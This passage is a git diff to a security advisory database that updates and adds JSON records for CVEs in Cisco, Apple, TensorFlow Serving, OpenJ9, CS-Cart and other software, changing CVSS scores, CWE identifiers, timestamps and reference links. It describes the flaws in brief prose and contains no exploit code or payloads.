a/advisories/unreviewed/2022/05/GHSA-7vrx-w4v5-hwph/GHSA-7vrx-w4v5-hwph.json +++ b/advisories/unreviewed/2022/05/GHSA-7vrx-w4v5-hwph/GHSA-7vrx-w4v5-hwph.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7vrx-w4v5-hwph", - "modified": "2024-07-24T15:31:24Z", + "modified": "2025-07-31T18:31:47Z", "published": "2022-05-14T03:52:47Z", "aliases": [ "CVE-2017-6736" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://github.com/artkond/cisco-snmp-rce" }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" + }, { "type": "WEB", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" diff --git a/advisories/unreviewed/2022/05/GHSA-cw5p-gwrw-rv56/GHSA-cw5p-gwrw-rv56.json b/advisories/unreviewed/2022/05/GHSA-cw5p-gwrw-rv56/GHSA-cw5p-gwrw-rv56.json index 389feed86757d..ddabe12fc8b17 100644 --- a/advisories/unreviewed/2022/05/GHSA-cw5p-gwrw-rv56/GHSA-cw5p-gwrw-rv56.json +++ b/advisories/unreviewed/2022/05/GHSA-cw5p-gwrw-rv56/GHSA-cw5p-gwrw-rv56.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cw5p-gwrw-rv56", - "modified": "2022-05-13T01:36:28Z", + "modified": "2025-07-31T18:31:48Z", "published": "2022-05-13T01:36:28Z", "aliases": [ "CVE-2017-6742" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6742" }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" + }, { "type": "WEB", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" diff --git a/advisories/unreviewed/2022/05/GHSA-f29v-pr27-8f5j/GHSA-f29v-pr27-8f5j.json b/advisories/unreviewed/2022/05/GHSA-f29v-pr27-8f5j/GHSA-f29v-pr27-8f5j.json index b9aa048bce641..3158dc7fceec7 100644 --- a/advisories/unreviewed/2022/05/GHSA-f29v-pr27-8f5j/GHSA-f29v-pr27-8f5j.json +++ b/advisories/unreviewed/2022/05/GHSA-f29v-pr27-8f5j/GHSA-f29v-pr27-8f5j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f29v-pr27-8f5j", - "modified": "2022-05-13T01:36:32Z", + "modified": "2025-07-31T18:31:47Z", "published": "2022-05-13T01:36:32Z", "aliases": [ "CVE-2017-6737" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6737" }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" + }, { "type": "WEB", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" diff --git a/advisories/unreviewed/2022/05/GHSA-p8jh-6v2f-m29j/GHSA-p8jh-6v2f-m29j.json b/advisories/unreviewed/2022/05/GHSA-p8jh-6v2f-m29j/GHSA-p8jh-6v2f-m29j.json index 79abd3df9ebe8..6fcde1788acb1 100644 --- a/advisories/unreviewed/2022/05/GHSA-p8jh-6v2f-m29j/GHSA-p8jh-6v2f-m29j.json +++ b/advisories/unreviewed/2022/05/GHSA-p8jh-6v2f-m29j/GHSA-p8jh-6v2f-m29j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p8jh-6v2f-m29j", - "modified": "2022-05-13T01:36:28Z", + "modified": "2025-07-31T18:31:48Z", "published": "2022-05-13T01:36:28Z", "aliases": [ "CVE-2017-6739" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6739" }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" + }, { "type": "WEB", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" diff --git a/advisories/unreviewed/2022/05/GHSA-vmp6-vfp8-8398/GHSA-vmp6-vfp8-8398.json b/advisories/unreviewed/2022/05/GHSA-vmp6-vfp8-8398/GHSA-vmp6-vfp8-8398.json index fc8424aee1610..18bd87d355c67 100644 --- a/advisories/unreviewed/2022/05/GHSA-vmp6-vfp8-8398/GHSA-vmp6-vfp8-8398.json +++ b/advisories/unreviewed/2022/05/GHSA-vmp6-vfp8-8398/GHSA-vmp6-vfp8-8398.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vmp6-vfp8-8398", - "modified": "2022-05-13T01:36:28Z", + "modified": "2025-07-31T18:31:48Z", "published": "2022-05-13T01:36:28Z", "aliases": [ "CVE-2017-6740" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6740" }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" + }, { "type": "WEB", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" diff --git a/advisories/unreviewed/2024/11/GHSA-rg5m-fc62-h68h/GHSA-rg5m-fc62-h68h.json b/advisories/unreviewed/2024/11/GHSA-rg5m-fc62-h68h/GHSA-rg5m-fc62-h68h.json index 91e738e9946c0..46e8a9dd57348 100644 --- a/advisories/unreviewed/2024/11/GHSA-rg5m-fc62-h68h/GHSA-rg5m-fc62-h68h.json +++ b/advisories/unreviewed/2024/11/GHSA-rg5m-fc62-h68h/GHSA-rg5m-fc62-h68h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rg5m-fc62-h68h", - "modified": "2024-11-15T18:30:49Z", + "modified": "2025-07-31T18:31:50Z", "published": "2024-11-15T18:30:49Z", "aliases": [ "CVE-2022-20814" @@ -18,6 +18,22 @@ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-20814" + }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-csrf-sqpsSfY6" + }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-bng-Gmg5Gxt" + }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ncs4k-tl1-GNnLwC6" + }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-xr-cdp-wnALzvT2" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/05/GHSA-h488-5g2w-vhxr/GHSA-h488-5g2w-vhxr.json b/advisories/unreviewed/2025/05/GHSA-h488-5g2w-vhxr/GHSA-h488-5g2w-vhxr.json index 9f20b8217746a..3b313483b8cea 100644 --- a/advisories/unreviewed/2025/05/GHSA-h488-5g2w-vhxr/GHSA-h488-5g2w-vhxr.json +++ b/advisories/unreviewed/2025/05/GHSA-h488-5g2w-vhxr/GHSA-h488-5g2w-vhxr.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h488-5g2w-vhxr", - "modified": "2025-05-06T21:30:49Z", + "modified": "2025-07-31T18:31:54Z", "published": "2025-05-06T21:30:49Z", "aliases": [ "CVE-2025-0649" ], "details": "Incorrect JSON input stringification in Google's Tensorflow serving versions up to 2.18.0 allows for potentially unbounded recursion leading to server crash.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" @@ -26,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-121" + "CWE-121", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/05/GHSA-wmvg-c6fc-33c8/GHSA-wmvg-c6fc-33c8.json b/advisories/unreviewed/2025/05/GHSA-wmvg-c6fc-33c8/GHSA-wmvg-c6fc-33c8.json index cb835c0076ed9..648e66272cfc9 100644 --- a/advisories/unreviewed/2025/05/GHSA-wmvg-c6fc-33c8/GHSA-wmvg-c6fc-33c8.json +++ b/advisories/unreviewed/2025/05/GHSA-wmvg-c6fc-33c8/GHSA-wmvg-c6fc-33c8.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wmvg-c6fc-33c8", - "modified": "2025-05-09T21:31:19Z", + "modified": "2025-07-31T18:31:56Z", "published": "2025-05-09T21:31:19Z", "aliases": [ "CVE-2025-4447" ], "details": "In Eclipse OpenJ9 versions up to 0.51, when used with OpenJDK version 8 a stack based buffer overflow can be caused by modifying a file on disk that is read when the JVM starts.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:H/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/06/GHSA-wrfh-r93c-gw3f/GHSA-wrfh-r93c-gw3f.json b/advisories/unreviewed/2025/06/GHSA-wrfh-r93c-gw3f/GHSA-wrfh-r93c-gw3f.json index 8f47a0061a0bc..072fdd785f76f 100644 --- a/advisories/unreviewed/2025/06/GHSA-wrfh-r93c-gw3f/GHSA-wrfh-r93c-gw3f.json +++ b/advisories/unreviewed/2025/06/GHSA-wrfh-r93c-gw3f/GHSA-wrfh-r93c-gw3f.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wrfh-r93c-gw3f", - "modified": "2025-07-02T09:30:29Z", + "modified": "2025-07-31T18:31:57Z", "published": "2025-06-27T15:31:29Z", "aliases": [ "CVE-2025-6705" ], "details": "On open-vsx.org http://open-vsx.org/  it was possible to run an arbitrary build scripts for auto-published extensions because of missing sandboxing of CI job runs. An attacker who had access to an existing extension could take over the service account of the marketplace. The issue has been fixed on June 24th, 2025 and the vulnerable code present in the publish-extension code repository.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/07/GHSA-27vh-g29g-4cf7/GHSA-27vh-g29g-4cf7.json b/advisories/unreviewed/2025/07/GHSA-27vh-g29g-4cf7/GHSA-27vh-g29g-4cf7.json index d6a8c752d05bd..21773a1c53437 100644 --- a/advisories/unreviewed/2025/07/GHSA-27vh-g29g-4cf7/GHSA-27vh-g29g-4cf7.json +++ b/advisories/unreviewed/2025/07/GHSA-27vh-g29g-4cf7/GHSA-27vh-g29g-4cf7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-27vh-g29g-4cf7", - "modified": "2025-07-31T00:31:04Z", + "modified": "2025-07-31T18:31:59Z", "published": "2025-07-30T00:32:20Z", "aliases": [ "CVE-2025-31278" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in iPadOS 17.7.9, watchOS 11.6, visionOS 2.6, iOS 18.6 and iPadOS 18.6, macOS Sequoia 15.6, tvOS 18.6. Processing maliciously crafted web content may lead to memory corruption.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -44,8 +49,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:30Z" diff --git a/advisories/unreviewed/2025/07/GHSA-28h9-ww78-cwxg/GHSA-28h9-ww78-cwxg.json b/advisories/unreviewed/2025/07/GHSA-28h9-ww78-cwxg/GHSA-28h9-ww78-cwxg.json index d6febfe02fc9e..3ef09739f3ab0 100644 --- a/advisories/unreviewed/2025/07/GHSA-28h9-ww78-cwxg/GHSA-28h9-ww78-cwxg.json +++ b/advisories/unreviewed/2025/07/GHSA-28h9-ww78-cwxg/GHSA-28h9-ww78-cwxg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-28h9-ww78-cwxg", - "modified": "2025-07-30T00:32:21Z", + "modified": "2025-07-31T18:32:00Z", "published": "2025-07-30T00:32:21Z", "aliases": [ "CVE-2025-43188" ], "details": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.6. A malicious app may be able to gain root privileges.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:31Z" diff --git a/advisories/unreviewed/2025/07/GHSA-2c58-jp5q-q38f/GHSA-2c58-jp5q-q38f.json b/advisories/unreviewed/2025/07/GHSA-2c58-jp5q-q38f/GHSA-2c58-jp5q-q38f.json index d90e604dbdcf2..a92bbf9bc2038 100644 --- a/advisories/unreviewed/2025/07/GHSA-2c58-jp5q-q38f/GHSA-2c58-jp5q-q38f.json +++ b/advisories/unreviewed/2025/07/GHSA-2c58-jp5q-q38f/GHSA-2c58-jp5q-q38f.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2c58-jp5q-q38f", - "modified": "2025-07-31T00:31:05Z", + "modified": "2025-07-31T18:32:01Z", "published": "2025-07-30T00:32:22Z", "aliases": [ "CVE-2025-43240" ], "details": "A logic issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.6. A download's origin may be incorrectly associated.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-703" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:35Z" diff --git a/advisories/unreviewed/2025/07/GHSA-2x2p-cpx8-p838/GHSA-2x2p-cpx8-p838.json b/advisories/unreviewed/2025/07/GHSA-2x2p-cpx8-p838/GHSA-2x2p-cpx8-p838.json index c6201a39f4be7..23860845ee62f 100644 --- a/advisories/unreviewed/2025/07/GHSA-2x2p-cpx8-p838/GHSA-2x2p-cpx8-p838.json +++ b/advisories/unreviewed/2025/07/GHSA-2x2p-cpx8-p838/GHSA-2x2p-cpx8-p838.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2x2p-cpx8-p838", - "modified": "2025-07-30T00:32:19Z", + "modified": "2025-07-31T18:31:59Z", "published": "2025-07-30T00:32:19Z", "aliases": [ "CVE-2025-31275" ], "details": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.6. A sandboxed process may be able to launch any installed app.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-274" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:30Z" diff --git a/advisories/unreviewed/2025/07/GHSA-32gv-r223-hpr7/GHSA-32gv-r223-hpr7.json b/advisories/unreviewed/2025/07/GHSA-32gv-r223-hpr7/GHSA-32gv-r223-hpr7.json new file mode 100644 index 0000000000000..ea309edf11a2b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-32gv-r223-hpr7/GHSA-32gv-r223-hpr7.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-32gv-r223-hpr7", + "modified": "2025-07-31T18:32:03Z", + "published": "2025-07-31T18:32:03Z", + "aliases": [ + "CVE-2025-50848" + ], + "details": "A file upload vulnerability was discovered in CS Cart 4.18.3, allows attackers to execute arbitrary code. CS Cart 4.18.3 allows unrestricted upload of HTML files, which are rendered directly in the browser when accessed. This allows an attacker to upload a crafted HTML file containing malicious content, such as a fake login form for credential harvesting or scripts for Cross-Site Scripting (XSS) attacks. Since the content is served from a trusted domain, it significantly increases the likelihood of successful phishing or script execution against other users.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50848" + }, + { + "type": "WEB", + "url": "https://github.com/hackerwahab/CS-Cart-Vulns/blob/main/CVE-2025-50848.md" + }, + { + "type": "WEB", + "url": "http://cs.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T16:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-3prx-m3mm-fp9r/GHSA-3prx-m3mm-fp9r.json b/advisories/unreviewed/2025/07/GHSA-3prx-m3mm-fp9r/GHSA-3prx-m3mm-fp9r.json index ac07d4119c2f3..60ff16c458c68 100644 --- a/advisories/unreviewed/2025/07/GHSA-3prx-m3mm-fp9r/GHSA-3prx-m3mm-fp9r.json +++ b/advisories/unreviewed/2025/07/GHSA-3prx-m3mm-fp9r/GHSA-3prx-m3mm-fp9r.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3prx-m3mm-fp9r", - "modified": "2025-07-30T00:32:23Z", + "modified": "2025-07-31T18:32:02Z", "published": "2025-07-30T00:32:23Z", "aliases": [ "CVE-2025-43261" ], "details": "A logic issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.6, macOS Sonoma 14.7.7, macOS Ventura 13.7.7. An app may be able to break out of its sandbox.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-693" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:37Z" diff --git a/advisories/unreviewed/2025/07/GHSA-3w65-g885-345g/GHSA-3w65-g885-345g.json b/advisories/unreviewed/2025/07/GHSA-3w65-g885-345g/GHSA-3w65-g885-345g.json new file mode 100644 index 0000000000000..e32e4610a9ac9 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-3w65-g885-345g/GHSA-3w65-g885-345g.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3w65-g885-345g", + "modified": "2025-07-31T18:31:52Z", + "published": "2025-07-31T18:31:52Z", + "aliases": [ + "CVE-2025-0889" + ], + "details": "Prior to 25.2, a local authenticated attacker can elevate privileges on a system with Privilege Management for Windows installed, via the manipulation of COM objects under certain circumstances where an EPM policy allows for automatic privilege elevation of a user process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0889" + }, + { + "type": "WEB", + "url": "https://www.beyondtrust.com/trust-center/security-advisories/bt25-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-268" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-26T08:13:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-3x8x-wfc9-4c2q/GHSA-3x8x-wfc9-4c2q.json b/advisories/unreviewed/2025/07/GHSA-3x8x-wfc9-4c2q/GHSA-3x8x-wfc9-4c2q.json index 3865db7808d79..5e4b4303ebe8f 100644 --- a/advisories/unreviewed/2025/07/GHSA-3x8x-wfc9-4c2q/GHSA-3x8x-wfc9-4c2q.json +++ b/advisories/unreviewed/2025/07/GHSA-3x8x-wfc9-4c2q/GHSA-3x8x-wfc9-4c2q.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3x8x-wfc9-4c2q", - "modified": "2025-07-30T00:32:22Z", + "modified": "2025-07-31T18:32:02Z", "published": "2025-07-30T00:32:22Z", "aliases": [ "CVE-2025-43243" ], "details": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.6, macOS Ventura 13.7.7, macOS Sonoma 14.7.7. An app may be able to modify protected parts of the file system.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-732" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:36Z" diff --git a/advisories/unreviewed/2025/07/GHSA-49w2-42m2-3c53/GHSA-49w2-42m2-3c53.json b/advisories/unreviewed/2025/07/GHSA-49w2-42m2-3c53/GHSA-49w2-42m2-3c53.json index 04d13af6e6722..39aff25ebf940 100644 --- a/advisories/unreviewed/2025/07/GHSA-49w2-42m2-3c53/GHSA-49w2-42m2-3c53.json +++ b/advisories/unreviewed/2025/07/GHSA-49w2-42m2-3c53/GHSA-49w2-42m2-3c53.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-49w2-42m2-3c53", - "modified": "2025-07-30T00:32:20Z", + "modified": "2025-07-31T18:32:00Z", "published": "2025-07-30T00:32:20Z", "aliases": [ "CVE-2025-31280" ], "details": "A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.6. Processing a maliciously crafted file may lead to heap corruption.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:31Z" diff --git a/advisories/unreviewed/2025/07/GHSA-4c8j-3p6w-vq76/GHSA-4c8j-3p6w-vq76.json b/advisories/unreviewed/2025/07/GHSA-4c8j-3p6w-vq76/GHSA-4c8j-3p6w-vq76.json index 294c718b64655..cc3002203377b 100644 --- a/advisories/unreviewed/2025/07/GHSA-4c8j-3p6w-vq76/GHSA-4c8j-3p6w-vq76.json +++ b/advisories/unreviewed/2025/07/GHSA-4c8j-3p6w-vq76/GHSA-4c8j-3p6w-vq76.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-284" + "CWE-284", + "CWE-434" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-574p-2r3p-7673/GHSA-574p-2r3p-7673.json b/advisories/unreviewed/2025/07/GHSA-574p-2r3p-7673/GHSA-574p-2r3p-7673.json index 01e8f78b989d8..ed3d41aa09947 100644 --- a/advisories/unreviewed/2025/07/GHSA-574p-2r3p-7673/GHSA-574p-2r3p-7673.json +++ b/advisories/unreviewed/2025/07/GHSA-574p-2r3p-7673/GHSA-574p-2r3p-7673.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-574p-2r3p-7673", - "modified": "2025-07-30T00:32:21Z", + "modified": "2025-07-31T18:32:00Z", "published": "2025-07-30T00:32:21Z", "aliases": [ "CVE-2025-43189" ], "details": "This issue was addressed with improved memory handling. This issue is fixed in macOS Sequoia 15.6, macOS Sonoma 14.7.7. A malicious app may be able to read kernel memory.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:31Z" diff --git a/advisories/unreviewed/2025/07/GHSA-642p-23g6-ph4w/GHSA-642p-23g6-ph4w.json b/advisories/unreviewed/2025/07/GHSA-642p-23g6-ph4w/GHSA-642p-23g6-ph4w.json index f4983c6c7aeac..867e325403afe 100644 --- a/advisories/unreviewed/2025/07/GHSA-642p-23g6-ph4w/GHSA-642p-23g6-ph4w.json +++ b/advisories/unreviewed/2025/07/GHSA-642p-23g6-ph4w/GHSA-642p-23g6-ph4w.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-642p-23g6-ph4w", - "modified": "2025-07-31T00:31:05Z", + "modified": "2025-07-31T18:32:00Z", "published": "2025-07-30T00:32:21Z", "aliases": [ "CVE-2025-43213" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Sequoia 15.6, iOS 18.6 and iPadOS 18.6, tvOS 18.6, watchOS 11.6, visionOS 2.6. Processing maliciously crafted web content may lead to an unexpected Safari crash.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -40,8 +45,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:33Z" diff --git a/advisories/unreviewed/2025/07/GHSA-6c8f-35g7-q3cm/GHSA-6c8f-35g7-q3cm.json b/advisories/unreviewed/2025/07/GHSA-6c8f-35g7-q3cm/GHSA-6c8f-35g7-q3cm.json new file mode 100644 index 0000000000000..d30b25213d39d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6c8f-35g7-q3cm/GHSA-6c8f-35g7-q3cm.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6c8f-35g7-q3cm", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2025-52203" + ], + "details": "A stored cross-site scripting (XSS) vulnerability exists in DevaslanPHP project-management v1.2.4. The vulnerability resides in the Ticket Name field, which fails to properly sanitize user-supplied input. An authenticated attacker can inject malicious JavaScript payloads into this field, which are subsequently stored in the database. When a legitimate user logs in and is redirected to the Dashboard panel \"automatically upon authentication the malicious script executes in the user's browser context.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52203" + }, + { + "type": "WEB", + "url": "https://github.com/devaslanphp/project-management/releases" + }, + { + "type": "WEB", + "url": "https://github.com/ischyr/research-and-development/tree/main/CVE-2025-52203" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T16:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6c9h-8vxc-74xh/GHSA-6c9h-8vxc-74xh.json b/advisories/unreviewed/2025/07/GHSA-6c9h-8vxc-74xh/GHSA-6c9h-8vxc-74xh.json new file mode 100644 index 0000000000000..3214d04178fbf --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6c9h-8vxc-74xh/GHSA-6c9h-8vxc-74xh.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", 